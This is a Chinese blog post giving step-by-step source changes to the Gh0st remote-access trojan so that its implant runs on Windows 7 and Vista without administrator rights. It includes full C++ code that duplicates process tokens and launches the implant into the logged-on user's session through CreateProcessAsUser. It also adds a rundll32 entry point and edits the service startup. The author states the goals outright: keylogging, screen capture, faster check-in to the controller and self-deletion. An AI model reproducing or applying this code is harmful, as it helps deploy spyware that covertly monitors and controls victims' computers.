以前的老文章了,做下记录吧,这两天帮朋友改一个Gh0st,在测试Win7功能的时候发现以前网上公布的方法不是很好兼容,虽然屏幕和键盘记录可以用,但是上线速度很慢,而且服务端不会自删除.更重要的是还得用管理员模式才能运行,反复找资料和测试.终于解决了Gh0st完美兼容Win7和Vista的问题,双击就可以运行,我尽量把笔记写的详细些.如果还有朋友不懂的话在这里留言,我看到会尽量帮大家解决.
打开server的until.cpp文件.在最后面#endif的上面加上下列代码
DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand ) { DWORD dwRet = 0; PROCESS_INFORMATION pi; STARTUPINFO si; DWORD dwSessionId; HANDLE hUserToken = NULL; HANDLE hUserTokenDup = NULL; HANDLE hPToken = NULL; HANDLE hProcess = NULL; DWORD dwCreationFlags; HMODULE hInstKernel32 = NULL; typedef DWORD (WINAPI *WTSGetActiveConsoleSessionIdPROC)(); WTSGetActiveConsoleSessionIdPROC WTSGetActiveConsoleSessionId = NULL; hInstKernel32 = LoadLibrary("Kernel32.dll"); if (!hInstKernel32) { return FALSE; } WTSGetActiveConsoleSessionId = (WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,"WTSGetActiveConsoleSessionId"); // Log the client on to the local computer. dwSessionId = WTSGetActiveConsoleSessionId(); do { WTSQueryUserToken( dwSessionId,&hUserToken ); dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE; ZeroMemory( &si, sizeof( STARTUPINFO ) ); si.cb= sizeof( STARTUPINFO ); si.lpDesktop = "winsta0default"; ZeroMemory( &pi, sizeof(pi) ); TOKEN_PRIVILEGES tp; LUID luid; if( !::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID | TOKEN_READ | TOKEN_WRITE, &hPToken ) ) { dwRet = GetLastError(); break; } else; if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &luid ) ) { dwRet = GetLastError(); break; } else; tp.PrivilegeCount =1; tp.Privileges[0].Luid =luid; tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED; if( !DuplicateTokenEx( hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hUserTokenDup ) ) { dwRet = GetLastError(); break; } else; //Adjust Token privilege if( !SetTokenInformation( hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD) ) ) { dwRet = GetLastError(); break; } else; if( !AdjustTokenPrivileges( hUserTokenDup, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL ) ) { dwRet = GetLastError(); break; } else; LPVOID pEnv =NULL; DWORD (__stdcall *CreateEnvironmentBlock)( LPVOID *, HANDLE, BOOL ); CreateEnvironmentBlock = (DWORD (__stdcall *)(LPVOID *, HANDLE,BOOL))GetProcAddress( LoadLibrary("UserEnv.dll"), "CreateEnvironmentBlock" ); if (!CreateEnvironmentBlock) break; if( CreateEnvironmentBlock( &pEnv, hUserTokenDup, TRUE ) ) { dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT; } else pEnv=NULL; // Launch the process in the client's logon session. if( CreateProcessAsUser( hUserTokenDup, // client's access token NULL, // file to execute lpCommand, // command line NULL, // pointer to process SECURITY_ATTRIBUTES NULL, // pointer to thread SECURITY_ATTRIBUTES FALSE, // handles are not inheritable dwCreationFlags,// creation flags pEnv, // pointer to new environment block NULL, // name of current directory &si, // pointer to STARTUPINFO structure &pi // receives information about new process ) ) { } else { dwRet = GetLastError(); break; } } while( 0 ); //Perform All the Close Handles task if( NULL != hUserToken ) { CloseHandle( hUserToken ); } else; if( NULL != hUserTokenDup) { CloseHandle( hUserTokenDup ); } else; if( NULL != hPToken ) { CloseHandle( hPToken ); } else; return dwRet; }
然后打开until.h 同样在最后面的#endif上面加上
DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand );
然后打开svchost.cpp
搜索
extern "C" __declspec(dllexport) void ServiceMain( int argc, wchar_t* argv[] )
在上面加上
extern "C" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow ) { main(lpCmdLine); }
搜索
g_dwServiceType = QueryServiceTypeFromRegedit(svcname);
在下面加上
HANDLE hThread = NULL; OSVERSIONINFO OsVerInfoEx; OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&OsVerInfoEx); if ( OsVerInfoEx.dwMajorVersion < 6 )//判断那种系统,如果小于6,直接用原来的代码 { HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL); } else { CHAR lpCommand[256]; CHAR Start[MAX_PATH]; GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start)); wsprintf(lpCommand,"rundll32.exe %s, XiaoDeBu %s",Start, svcname ); LaunchAppIntoDifferentSession(lpCommand); }
然后把
HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
这句注释掉.